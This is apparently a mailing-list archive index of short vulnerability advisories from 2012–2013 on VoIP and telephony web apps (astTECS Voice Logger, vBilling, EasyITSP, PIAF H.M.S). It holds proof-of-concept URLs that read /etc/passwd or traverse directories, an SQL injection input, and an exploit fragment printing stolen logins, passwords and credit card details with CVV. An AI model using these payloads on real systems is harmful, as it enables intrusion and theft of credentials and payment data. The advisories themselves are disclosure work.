Voice Logger astTECS - bypass login & arbitrary file download

2013-07-16 Thread Michał Błaszczak
: 168 file: manager_login.server.php
2) arbitrary file download
http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
line: 2 file: records.php
http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
line: 2 file: records.php
3) and other security bugs
Michał Błaszczak http://blaszczakm.blogspot.com

[SQLi] vBilling for FreeSWITCH

2013-04-22 Thread Michał Błaszczak
ectory_id = '".$record_id."' ";
2) SQL Injection
http://vbilling-host/customer/edit_customer
input Firstname: zuo’;-- (example)
Michał Błaszczak http://blaszczakm.blogspot.com

Directory Traversal - EasyITSP <= 2.0.7

2013-02-04 Thread Michał Błaszczak
txt") as $filename) {
file: voicemail.php line: 186 - 190
if(isset($_GET['folder'])) {
    $vmfolder = $_GET['folder'];
} else {
    $vmfolder = "INBOX";
}
POC: http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../
Michał Błaszczak http://blaszczakm.blogspot.com

PIAF H.M.S - SQL Injection

2012-10-29 Thread Michał Błaszczak
# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/
file: bills.php line: 86-87
$query = $query . " ORDER BY ID DESC";
printf($quer

Exploit - EasyITSP by Lemens Telephone Systems 2.0.2

2012-10-29 Thread Michał Błaszczak
$test = explode(" ",$login[1]);
if(trim($test[0])!='') {
    echo 'ID:'.$id_pod."\n";
    echo 'LOGIN:'.$login[1]."\n";
    echo 'Password:'.$pass[1]."\n";
    echo 'CCnumber:'.$ccnum[1]."\n";
    echo 'CCexpire:'.$ccexpire[1]."\n";
    echo 'CCCVV:'.$cccvv[1]."\n\n";
}
}
?>
Michał Błaszczak http://blaszczakm.blogspot.com